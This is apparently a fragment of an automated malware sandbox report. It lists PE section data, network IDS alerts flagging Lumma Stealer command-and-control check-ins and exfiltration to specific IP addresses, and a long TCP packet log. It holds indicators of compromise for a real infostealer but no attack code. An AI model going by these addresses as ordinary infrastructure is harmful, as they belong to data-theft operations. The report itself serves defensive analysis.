qsfumtfj  0x301000         0x1000        0x600     d11edd6dcec17f3795d279429a90e55b  False     0.5755208333333334    data                  4.940214585636233     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  0x302000         0x3000        0x2200    3a05fe056d66b54e264c38ff581bd0df  False     0.006548713235294118  DOS executable (COM)  0.019571456231530684  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL           Import
kernel32.dll  lstrcpy
Timestamp                        SID      Signature                                                  Severity  Source IP     Source Port  Dest IP         Dest Port  Protocol
2024-12-23T08:04:10.172670+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49701        104.21.36.201   443        TCP
2024-12-23T08:04:10.937958+0100  2049836  ET MALWARE Lumma Stealer Related Activity                  1         192.168.2.10  49701        104.21.36.201   443        TCP
2024-12-23T08:04:10.937958+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                  1         192.168.2.10  49701        104.21.36.201   443        TCP
2024-12-23T08:04:12.163814+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49703        104.21.36.201   443        TCP
2024-12-23T08:04:12.934573+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2               1         192.168.2.10  49703        104.21.36.201   443        TCP
2024-12-23T08:04:12.934573+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                  1         192.168.2.10  49703        104.21.36.201   443        TCP
2024-12-23T08:04:14.529127+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49709        104.21.36.201   443        TCP
2024-12-23T08:04:17.228213+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49715        104.21.36.201   443        TCP
2024-12-23T08:04:19.631552+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49721        104.21.36.201   443        TCP
2024-12-23T08:04:22.674668+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49732        104.21.36.201   443        TCP
2024-12-23T08:04:23.467326+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration      1         192.168.2.10  49732        104.21.36.201   443        TCP
2024-12-23T08:04:25.482375+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49740        104.21.36.201   443        TCP
2024-12-23T08:04:30.676889+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49752        104.21.36.201   443        TCP
2024-12-23T08:04:31.455213+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                  1         192.168.2.10  49752        104.21.36.201   443        TCP
2024-12-23T08:04:32.985383+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49758        185.166.143.50  443        TCP
2024-12-23T08:04:35.384918+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.10  49764        52.217.18.140   443        TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                                    Dec 23, 2024 08:04:19.640598059 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:19.640645981 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:19.640721083 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:19.640729904 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:20.654742956 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:20.654896021 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:20.655013084 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:20.659868956 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:20.659895897 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:21.455672026 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:21.455723047 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:21.455806017 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:21.456105947 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:21.456118107 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:22.674473047 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:22.674668074 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:22.676358938 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:22.676369905 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:22.676610947 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:22.678092003 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:22.678184032 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:22.678190947 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:23.467354059 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:23.467470884 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:23.467715979 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:23.471051931 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:23.471071959 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:24.268477917 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:24.268543005 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:24.268697023 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:24.269103050 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:24.269114971 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.482250929 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.482374907 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.483717918 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.483727932 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.483971119 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.494204998 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.495121002 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.495152950 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.495470047 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.495500088 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496314049 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496356964 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496489048 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496517897 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496716022 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496736050 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496882915 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496915102 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496927977 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496936083 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.497041941 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.497066975 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.497088909 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.497241020 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.497268915 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.539328098 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.543080091 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.543106079 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.543127060 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.543134928 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.543169975 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.543180943 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.391608953 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.391716957 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.391773939 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.391972065 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.391987085 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.456614971 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.456661940 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.456773043 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.457165956 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.457201958 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:30.676714897 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:30.676888943 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:30.682931900 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:30.682941914 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:30.683242083 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:30.691505909 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:30.691533089 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:30.691612005 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.455255032 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.455404997 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.455463886 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:31.455621958 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:31.455640078 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.455647945 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:31.455653906 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.595567942 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:31.595621109 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.595880985 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:31.596400976 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:31.596416950 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:32.985297918 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:32.985383034 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:32.987796068 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:32.987808943 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:32.988063097 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:32.989790916 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:33.035341024 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:33.671555042 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:33.671585083 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:33.671653986 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:33.671722889 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:33.671772003 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:33.672063112 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:33.672084093 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:33.672094107 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:33.672105074 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:33.968358994 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:33.968413115 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:33.968519926 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:33.968931913 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:33.968945980 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:35.384819031 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:35.384917974 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:35.386804104 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:35.386817932 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:35.387082100 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.908821106 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.908833981 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.908886909 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.908936977 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.938388109 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.938422918 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.938466072 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.938570023 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.938591957 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.938625097 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.949851036 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.949882030 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.949975967 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.949986935 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.961289883 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.961318970 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.961395979 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.961407900 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.972908974 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.972934008 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.973004103 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.973015070 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.984396935 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.984415054 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.984488010 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.984498024 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.995639086 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.995702982 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.995727062 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:36.995737076 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:36.995769978 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.007541895 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.007608891 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.007761002 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.007771969 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.007826090 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.016397953 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.016422033 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.016503096 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.016510963 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.016547918 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.016578913 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.024656057 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.024678946 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.024714947 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.024732113 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.024739981 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.024765015 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.024796963 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.032526970 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.032550097 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.032596111 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.032624960 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.032643080 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.032941103 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.032947063 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.040779114 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.040813923 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.040862083 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.040874004 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.040889025 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.048470974 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.048538923 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.048544884 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.048571110 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.048602104 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.055032015 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.055100918 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.055107117 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.055130959 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.055151939 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.103467941 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.103502989 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.150336027 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.193873882 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.193890095 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.193907976 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.193945885 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.193958998 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.193958044 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.193988085 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.194005013 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.194034100 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.196515083 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.196544886 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.196599007 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.196607113 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.196645021 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.200048923 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.200100899 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.200109959 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.200122118 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.200155020 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.200187922 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.203691006 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.203722954 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.203761101 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.203788996 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.203804970 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.203820944 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.206579924 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.206610918 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.206728935 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.206728935 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.206742048 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.210211992 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.210241079 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.210278988 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.210298061 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.210330963 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.213325977 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.213356018 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.213423014 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.213423014 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.213433027 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.216952085 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.216974974 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.217004061 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.217021942 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.217050076 CET49764443192.168.2.1052.217.18.140
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 08:04:37.221635103 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.387425900 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.387454987 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.387505054 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.387533903 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.387562990 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.387583017 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.391082048 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.391108990 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.391140938 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.391160011 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.391172886 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.394103050 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.394126892 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.394155979 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.394167900 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.394185066 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.397547007 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.397577047 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.397610903 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.397624969 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
